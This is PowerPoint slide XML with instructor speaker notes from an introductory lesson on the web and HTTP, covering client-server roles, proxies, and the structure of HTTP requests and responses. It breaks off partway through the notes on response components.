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5"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId66"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="507" r:id="rId2"/>
    <p:sldId id="1154" r:id="rId3"/>
    <p:sldId id="735" r:id="rId4"/>
    <p:sldId id="997" r:id="rId5"/>
    <p:sldId id="1147" r:id="rId6"/>
    <p:sldId id="971" r:id="rId7"/>
    <p:sldId id="975" r:id="rId8"/>
    <p:sldId id="969" r:id="rId9"/>
    <p:sldId id="925" r:id="rId10"/>
    <p:sldId id="996" r:id="rId11"/>
    <p:sldId id="736" r:id="rId12"/>
    <p:sldId id="1148" r:id="rId13"/>
    <p:sldId id="972" r:id="rId14"/>
    <p:sldId id="973" r:id="rId15"/>
    <p:sldId id="974" r:id="rId16"/>
    <p:sldId id="1000" r:id="rId17"/>
    <p:sldId id="999" r:id="rId18"/>
    <p:sldId id="1127" r:id="rId19"/>
    <p:sldId id="976" r:id="rId20"/>
    <p:sldId id="1149" r:id="rId21"/>
    <p:sldId id="977" r:id="rId22"/>
    <p:sldId id="1126" r:id="rId23"/>
    <p:sldId id="1129" r:id="rId24"/>
    <p:sldId id="978" r:id="rId25"/>
    <p:sldId id="1144" r:id="rId26"/>
    <p:sldId id="1150" r:id="rId27"/>
    <p:sldId id="1155" r:id="rId28"/>
    <p:sldId id="1151" r:id="rId29"/>
    <p:sldId id="938" r:id="rId30"/>
    <p:sldId id="939" r:id="rId31"/>
    <p:sldId id="738" r:id="rId32"/>
    <p:sldId id="982" r:id="rId33"/>
    <p:sldId id="983" r:id="rId34"/>
    <p:sldId id="1099" r:id="rId35"/>
    <p:sldId id="1113" r:id="rId36"/>
    <p:sldId id="1063" r:id="rId37"/>
    <p:sldId id="1100" r:id="rId38"/>
    <p:sldId id="1102" r:id="rId39"/>
    <p:sldId id="1103" r:id="rId40"/>
    <p:sldId id="1104" r:id="rId41"/>
    <p:sldId id="1114" r:id="rId42"/>
    <p:sldId id="1130" r:id="rId43"/>
    <p:sldId id="1152" r:id="rId44"/>
    <p:sldId id="1132" r:id="rId45"/>
    <p:sldId id="1133" r:id="rId46"/>
    <p:sldId id="737" r:id="rId47"/>
    <p:sldId id="1153" r:id="rId48"/>
    <p:sldId id="1134" r:id="rId49"/>
    <p:sldId id="1135" r:id="rId50"/>
    <p:sldId id="1136" r:id="rId51"/>
    <p:sldId id="1137" r:id="rId52"/>
    <p:sldId id="1140" r:id="rId53"/>
    <p:sldId id="1138" r:id="rId54"/>
    <p:sldId id="1139" r:id="rId55"/>
    <p:sldId id="1141" r:id="rId56"/>
    <p:sldId id="1142" r:id="rId57"/>
    <p:sldId id="1145" r:id="rId58"/>
    <p:sldId id="1156" r:id="rId59"/>
    <p:sldId id="1157" r:id="rId60"/>
    <p:sldId id="954" r:id="rId61"/>
    <p:sldId id="1146" r:id="rId62"/>
    <p:sldId id="1158" r:id="rId63"/>
    <p:sldId id="740" r:id="rId6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B87"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="FFF2CC"/>
    <a:srgbClr val="C0504D"/>
    <a:srgbClr val="FF8200"/>
    <a:srgbClr val="BF5700"/>
    <a:srgbClr val="1D1A36"/>
    <a:srgbClr val="262626"/>
    <a:srgbClr val="1B306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02" autoAdjust="0"/>
    <p:restoredTop sz="67273" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="3768" y="192"/>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12/5/18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12/5/18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Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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1711898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Seems like a silly question, but explain that the point is to emphasize: The Internet is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>just another network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>—what makes it unique is simply that it uses HTTP to fulfill requests/responses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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88317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under this definition, there’s nothing “special” about the Internet relative to other networks we’ve studied thus far: The Internet is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>just the network we already know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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248064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characteristic of the web that makes it “special” in our studies is that it primarily leverages HTTP over TCP/IP, as opposed to other protocols we’ve studied, such as FTP, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Emphasize that the same basic client-server architecture that we’re already familiar remains relevant, however.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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527296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key devices that support the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Clients/End Devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Devices that initiate HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Routers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Devices that determine how to get traffic from a client to a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Devices that fulfill requests/provide responses to requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Proxy Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: Servers that sit between clients and destination servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that client-server architecture allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>use resources without having to know where they are.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>If a client realizes it needs a resource, it simply requests it from a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>In turn, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>server’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> job is to know where resources live, and be able to provide them when requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Often, these resources live on the server’s filesystem, or in a database elsewhere on the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Either way, the server knows how to get the resource, and will send it to whomever asks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Proxy Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> are devices that “intercept” client requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Proxies play multiple roles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>A proxy can be placed outside of a LAN, in order to throttle the amount of requests that the LAN sends to the Internet (to reduce bandwidth usage)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Attackers can use proxies to steal data inside of requests (as in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Man in the Middle Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> can use proxies to inspect and change requests/responses as they send/receive them (as with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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2152713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Explain that the other distinguishing factor about the web is that it handles more user data than any other network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>As security revolves around protecting the privacy, integrity, and availability of information, this makes the web a crucial area of study for new professionals, and a popular target for attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Emphasize that the numbers on this slide, which detail how many Tweets, Google Queries, and Emails are sent every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>second</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> context as to just how much of that data is stored on, and distributed through, the web.</a:t>
            </a:r>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51613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343321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students that HTTP is an OSI Layer 7, or Application Layer, protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that HTTP is used to transfer web pages; static assets, such as images and HTML/markup files; and raw data, such as MP4 video or MP3 audio.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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4066514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that HTTP requests comprise up to four main components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>request line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which contains the HTTP verb; the path to the file on the server receiving the request; and the version of the HTTP protocol in use, which may be 1.0, 1.1, or 2.0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which are additional pieces of information the server can use to fulfill a request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>A line of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>whitespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which actually is an important part of a request, as it indicates the end of the header section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>request body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which contains data we send to the server. This is unique to POST requests, so the slide doesn’t contain this section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that the HTTP verb indicates what action the client wants the server to take.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that there are several HTTP verbs, but that we’ll concern ourselves primarily with the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> requests, which indicate that the client is requesting the server to provide a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> requests, which indicate that the client wants the server to save data that we’re sending it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Emphasize that there are too many headers to know off the top of one’s head, so students shouldn’t expect to have to remember them all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that we’ll see the most common headers as we continue to explore requests and responses in more detail, and that we’ll provide links to reference documentation which students can use to conduct their own research later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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174581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Explain that GET requests can also send data with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>query parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that query parameters appear in the name of the request resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Point out:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The path to the request filed is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/articles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>After the path, there is a question mark: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The question mark is followed by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>tag=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>latest&amp;author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=jane</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This sends the server two parameters/pieces of data, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, with the values </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, respectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The server will probably use these to look up the latest articles by the author Jane.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Emphasize the syntax for query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>parmaters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>firstParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>value&amp;secondParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>There is no limit on the number of query params a user can send via GET requests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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775280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structure of an HTTP POST request is similar, but includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>request body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> below the whitespace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Point out that POST requests also always include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> headers, indicating the size of the data the server should expect, and the type.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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96038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08923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that responses comprise four main components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>status line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, containing the version of HTTP in use; a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>status code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which is a number between 1xx and 5xx indicating whether the server was successful in fulfilling the request; and a textual representation of the status code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, which influence the way that clients interpret the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>A line of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>whitespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> to separate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>response header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>response message body</a:t>
            </a:r>
